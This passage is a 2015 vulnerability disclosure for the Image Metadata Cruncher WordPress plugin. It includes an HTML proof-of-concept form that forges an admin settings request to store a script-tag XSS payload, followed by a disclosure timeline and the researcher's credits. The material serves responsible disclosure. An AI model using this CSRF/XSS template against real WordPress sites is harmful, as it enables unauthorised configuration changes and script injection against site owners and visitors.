https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))
After installing the plugin
Stored XSS:
This Plugin is also vulnerable for CSRF Attack also below is the POC for the same
<html>
<body>
<form action="http://localhost/wordpress/wp-admin/options.php" method="POST">
<input type="hidden" name="option_page" value="image_metadata_cruncher_title" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="_wpnonce" value="0061596f3e" />
<input type="hidden" name="_wp_http_referer" value="/wordpress/wp-admin/plugins.php?page=image_metadata_cruncher-options" />
<input type="hidden" name="option_page" value="image_metadata_cruncher_alt" />
<input type="hidden" name="action" value="update" />
<input type="hidden" name="_wpnonce" value="d3134676c2" />
<input type="hidden" name="_wp_http_referer" value="/wordpress/wp-admin/plugins.php?page=image_metadata_cruncher-options" />
<input type="hidden" name="image_metadata_cruncher[enable_highlighting]" value="enable" />
<input type="hidden" name="image_metadata_cruncher[title]" value="{ IPTC:Headline }" />
<input type="hidden" name="image_metadata_cruncher[alt]" value="<script>alert("1")</script>" />
<input type="hidden" name="image_metadata_cruncher[caption]" value="alert("1")" />
<input type="hidden" name="image_metadata_cruncher[description]" value="{ IPTC:Caption | EXIF:ImageDescription }" />
<input type="hidden" name="submit" value="Save Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
Next time when u navigate to page you will see XSS in action cheers
Mitigation:
Developer will fix this in next realese.
1-feb-2015 Repoerted to Developer
2-Feb-2015 Acknodlagement from Developer
8-feb-2015 Ask update from developer
13-feb-2015 Inform developer about Public discloser with confirmation of patching this in next realese
14-feb-2015 Inform to Bugtraq,Public Disclose
17-feb-2015 Reposting with cve and csrf POC
#credits:
Kaustubh Padwad
Information Security Researcher
[email protected]
https://twitter.com/s3curityb3ast
http://breakthesec.com
https://www.linkedin.com/in/kaustubhpadwad